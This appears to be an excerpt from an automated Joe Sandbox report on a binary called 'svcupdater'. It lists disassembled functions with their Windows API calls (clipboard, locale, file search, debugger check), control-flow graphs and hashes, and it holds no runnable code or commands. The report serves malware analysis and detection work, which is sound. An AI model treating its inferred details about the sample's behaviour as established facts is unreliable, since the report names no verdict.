                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 442123175-0
                                                                                                    • Opcode ID: a7cc06faab4be4832b2ca59eb891fdd47ec46a1c37ef698f2ff2375c2635bc97
                                                                                                    • Instruction ID: 034325ea3b9f136be42c6e6bad9d96b162f9dc328e4f6b44b3628342d909df60
                                                                                                    • Opcode Fuzzy Hash: a7cc06faab4be4832b2ca59eb891fdd47ec46a1c37ef698f2ff2375c2635bc97
                                                                                                    • Instruction Fuzzy Hash: 93219134A002599BCB19CF19DC80AEDB7FAEF4D301F2444AAEA46D7251D6309E46CB64
                                                                                                    Function 00C07BAF Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1403 c07baf-c07bd5 call c07985 1406 c07bd7-c07be9 call c104b7 1403->1406 1407 c07c2e-c07c31 1403->1407 1409 c07bee-c07bf3 1406->1409 1409->1407 1410 c07bf5-c07c2d 1409->1410
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 9634f834abe76725c9ee6ceb3a944fe2018c04ff273847626e0ef1d172ca839f
                                                                                                    • Instruction ID: 4b628e82652574a9380001ee41f3524c48bebd77a343b5f61ead89746ee6022e
                                                                                                    • Opcode Fuzzy Hash: 9634f834abe76725c9ee6ceb3a944fe2018c04ff273847626e0ef1d172ca839f
                                                                                                    • Instruction Fuzzy Hash: 01115771A0420AAFCF09DF58E941A9F7BF5EF48304F154069F808EB251D630EA11CBA4
                                                                                                    Function 00BF53CC Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1411 bf53cc-bf53cf 1412 bf53de-bf53e1 call bfdcb6 1411->1412 1414 bf53e6-bf53e9 1412->1414 1415 bf53eb-bf53ec 1414->1415 1416 bf53d1-bf53dc call c01945 1414->1416 1416->1412 1419 bf53ed-bf53f1 1416->1419 1420 bf53f7 1419->1420 1421 be1b30-be1b80 call be1b10 call bf691b call bf63d1 1419->1421 1420->1420
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE1B6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___std_exception_copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2659868963-0
                                                                                                    • Opcode ID: 0df8b0160422b706f39ffdb21ee33f1460b36bd8537345544f71aff4b76539d0
                                                                                                    • Instruction ID: b3d89a201618a8522c3928475c7d64a23d0c90a17f2ed37a5c45adba043323aa
                                                                                                    • Opcode Fuzzy Hash: 0df8b0160422b706f39ffdb21ee33f1460b36bd8537345544f71aff4b76539d0
                                                                                                    • Instruction Fuzzy Hash: 8D014E7140070D67CB24AFADDC419AA77ECDE01360B2085B5FF149B581FBB0E598C2D4
                                                                                                    Function 00C03AE9 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1428 c03ae9-c03af5 1429 c03b27-c03b32 call bfe7f3 1428->1429 1430 c03af7-c03af9 1428->1430 1438 c03b34-c03b36 1429->1438 1431 c03b12-c03b23 RtlAllocateHeap 1430->1431 1432 c03afb-c03afc 1430->1432 1434 c03b25 1431->1434 1435 c03afe-c03b05 call c018fa 1431->1435 1432->1431 1434->1438 1435->1429 1440 c03b07-c03b10 call c01945 1435->1440 1440->1429 1440->1431
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF63FB,?,?,?,?,?,00BE2EE7,?,?,?), ref: 00C03B1B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 7616fa997d0ccd835f7f6778ed33e03e2a2e000d55a8d0e2107a30deaf7c6d66
                                                                                                    • Instruction ID: 8831571bd8fdbc7568f047d39aa87c18c43e9eb384adbfdbbc1f1d02967c42d3
                                                                                                    • Opcode Fuzzy Hash: 7616fa997d0ccd835f7f6778ed33e03e2a2e000d55a8d0e2107a30deaf7c6d66
                                                                                                    • Instruction Fuzzy Hash: 4DE092312052B1ABEB312AA69C02F6E764CEF467B4F150260AD659A0D1DF60CF01E2E9
                                                                                                    Function 00C10190 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1443 c10190-c101b4 CreateFileW
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,00000000,?,00C10580,?,?,00000000,?,00C10580,?,0000000C), ref: 00C101AD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: a4416a2c5c0dbe3d821fa3f2b4f1f774ecfab9b71017db3621f3829f5d278e5c
                                                                                                    • Instruction ID: 7b067d9808b6e71ed8b0f39333ab5d9d09303c97d7dc68f1ebbc89244dfb62f3
                                                                                                    • Opcode Fuzzy Hash: a4416a2c5c0dbe3d821fa3f2b4f1f774ecfab9b71017db3621f3829f5d278e5c
                                                                                                    • Instruction Fuzzy Hash: 83D06C3204010DFBDF028F84DC06EDA3BAAFB8C714F058000BA1856060C732E822AB90
                                                                                                    Function 00BE3C80 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(DEADBEEF,2F4C7F60), ref: 00BE3CBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c9905dc23de92ac0b98c305eb191268de78ae055b00218517e64db7cdc5e685e
                                                                                                    • Instruction ID: 4acd15b69780632dce2a4d17a1831fdb33847e7bd42fa9d2ce1c0d5695273e35
                                                                                                    • Opcode Fuzzy Hash: c9905dc23de92ac0b98c305eb191268de78ae055b00218517e64db7cdc5e685e
                                                                                                    • Instruction Fuzzy Hash: 94F0B472944748EFCB10CF99DC41B9EBBB8FB45721F10422AE41593680D73415048694

                                                                                                    Non-executed Functions

                                                                                                    Function 00BE2B90 Relevance: 18.1, APIs: 12, Instructions: 91clipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$AllocEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4230510986-0
                                                                                                    • Opcode ID: 3cc6dcf246a870ef29dd3f6509e862f3e963cc1ee4105d392749691153937ad2
                                                                                                    • Instruction ID: e70a63f7eb1709a2c3366dc98a30d5ae265050ceba51842436db91b7835c0014
                                                                                                    • Opcode Fuzzy Hash: 3cc6dcf246a870ef29dd3f6509e862f3e963cc1ee4105d392749691153937ad2
                                                                                                    • Instruction Fuzzy Hash: 3E21B371204944EFD7165F36EC8CBBE3BACFF86752B248594FA46C2241DB20D841C6A1
                                                                                                    Function 00C0D628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C0D946,00000002,00000000,?,?,?,00C0D946,?,00000000), ref: 00C0D6C1
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00C0D946,00000002,00000000,?,?,?,00C0D946,?,00000000), ref: 00C0D6EA
                                                                                                    • GetACP.KERNEL32(?,?,00C0D946,?,00000000), ref: 00C0D6FF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 5297c558ba05899e8a13a6b5e12223c67324e54915379a090fe6674fddac9bbc
                                                                                                    • Instruction ID: 53f7bd04741f783c81cb8cb76b05e9d33fd5c11e496497724083c07cb570da66
                                                                                                    • Opcode Fuzzy Hash: 5297c558ba05899e8a13a6b5e12223c67324e54915379a090fe6674fddac9bbc
                                                                                                    • Instruction Fuzzy Hash: 4821D0A2A00104EADB308F99D905B9773A6AF50B60B578864F92FCB184F733DF40D750
                                                                                                    Function 00C0D7FD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C02340: GetLastError.KERNEL32(?,00000008,00C09A39), ref: 00C02344
                                                                                                      • Part of subcall function 00C02340: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00C023E6
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C0D909
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00C0D952
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C0D961
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C0D9A9
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C0D9C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 415426439-0
                                                                                                    • Opcode ID: 856b0fbc22be9c6589ff9aa1726263dbd68f4cffdb0e027c8072433e3c0aa1c9
                                                                                                    • Instruction ID: edd734900cf7d98efb54605afda9f6408138359a2a1f6e629c94581ff8e05b3b
                                                                                                    • Opcode Fuzzy Hash: 856b0fbc22be9c6589ff9aa1726263dbd68f4cffdb0e027c8072433e3c0aa1c9
                                                                                                    • Instruction Fuzzy Hash: 74516B72A00609ABEF10DFE5DC45BBEB7B8BF45700F184569E916EB1D0EB709A40DB60
                                                                                                    Function 00C03CF8 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3213747228-0
                                                                                                    • Opcode ID: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction ID: 9c003af68e8204f75ab2096efc2b2c0b9682b1516ce20027538d37d024b06d37
                                                                                                    • Opcode Fuzzy Hash: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction Fuzzy Hash: 3AB13972D042969FDB158F68C8817EEBBB9EF59300F1441AAE925EB2C1D2359F41CB60
                                                                                                    Function 00C0A1F1 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C0A2E1
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C0A3D5
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00C0A414
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00C0A447
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1164774033-0
                                                                                                    • Opcode ID: f5fdb1ed76ed68398d899689049ae6dca183c1caa8a0129c5f3a1af59c0048ca
                                                                                                    • Instruction ID: 4d902f7e2d92e5ab12d5700ab2b049a0936b9aa6c3bb6a86a8375c4bec39bbc0
                                                                                                    • Opcode Fuzzy Hash: f5fdb1ed76ed68398d899689049ae6dca183c1caa8a0129c5f3a1af59c0048ca
                                                                                                    • Instruction Fuzzy Hash: 5B7105B58052589FDF21EF68CC89BEEBBB9AB06300F1441E9E01D97291DA358F85DF11
                                                                                                    Function 00BF5B6A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BF5B76
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00BF5C42
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF5C62
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00BF5C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: abb5eca4b1209f2a6ae0ade72250f29579333ba22448c0206838691ea23ea922
                                                                                                    • Instruction ID: 4cd912da9cdb3b5279d97cb7d3e680e981bd2fb40da6ab93130f1e53f3798770
                                                                                                    • Opcode Fuzzy Hash: abb5eca4b1209f2a6ae0ade72250f29579333ba22448c0206838691ea23ea922
                                                                                                    • Instruction Fuzzy Hash: CB31067590521CDBDB20DFA4D989BDCBBF8FF08300F1041EAE509AB250EB705A888F44
                                                                                                    Function 00BE93A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9429
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE9475
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE954D
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE95E2
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE9607
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE960C
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE9611
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name$false$true
                                                                                                    • API String ID: 3559308103-1062449267
                                                                                                    • Opcode ID: 90a2d750530cb1269147bb3b2f48b989a3e56376366b0eca6fa8f3b8c4f6e53e
                                                                                                    • Instruction ID: e061036fecd1ceac8ab117411f6f7cbeb58bbae70897865fd6b26c430c9e1fac
                                                                                                    • Opcode Fuzzy Hash: 90a2d750530cb1269147bb3b2f48b989a3e56376366b0eca6fa8f3b8c4f6e53e
                                                                                                    • Instruction Fuzzy Hash: 38718FB0D013489FEF20DFA5D9457AEBBF4EF14300F1440AAE915A7382E7B59A49CB51
                                                                                                    Function 00BE8930 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8A48
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE8A94
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE8AAE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8B43
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8B50
                                                                                                      • Part of subcall function 00BF41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF41DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1592514138-1405518554
                                                                                                    • Opcode ID: 2b969e888947c91095f758c3941891c7ca0bb4289b0cf4f5bed228764dd74c6c
                                                                                                    • Instruction ID: af172d1ce58373b666429ad04da9e3c44dc74845430e2956a7ab208fef0568cc
                                                                                                    • Opcode Fuzzy Hash: 2b969e888947c91095f758c3941891c7ca0bb4289b0cf4f5bed228764dd74c6c
                                                                                                    • Instruction Fuzzy Hash: C3618FB0D00648DFDF20DFA5D941BAEBBF4EF04314F1440A9E909A7352EB75A909CBA1
                                                                                                    Function 00BE8B80 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8BB6
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8BD8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8BF8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8C1F
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8C98
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE8CE4
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE8CFE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8D93
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8DA0
                                                                                                      • Part of subcall function 00BF41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF41DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1592514138-1405518554
                                                                                                    • Opcode ID: dfdcf548bd5e82a901a172d9028747c43c1e808e0c74a71dd580d3ee992db996
                                                                                                    • Instruction ID: 150dd095d88aa23890ea342b7c61d90354366c8d5a9f5875ea3e09eb602c8726
                                                                                                    • Opcode Fuzzy Hash: dfdcf548bd5e82a901a172d9028747c43c1e808e0c74a71dd580d3ee992db996
                                                                                                    • Instruction Fuzzy Hash: 5661A2B0D01648DFDF11DFA5D941BAEBBF4EF14310F1440A9E909A7382DB74A949CBA1
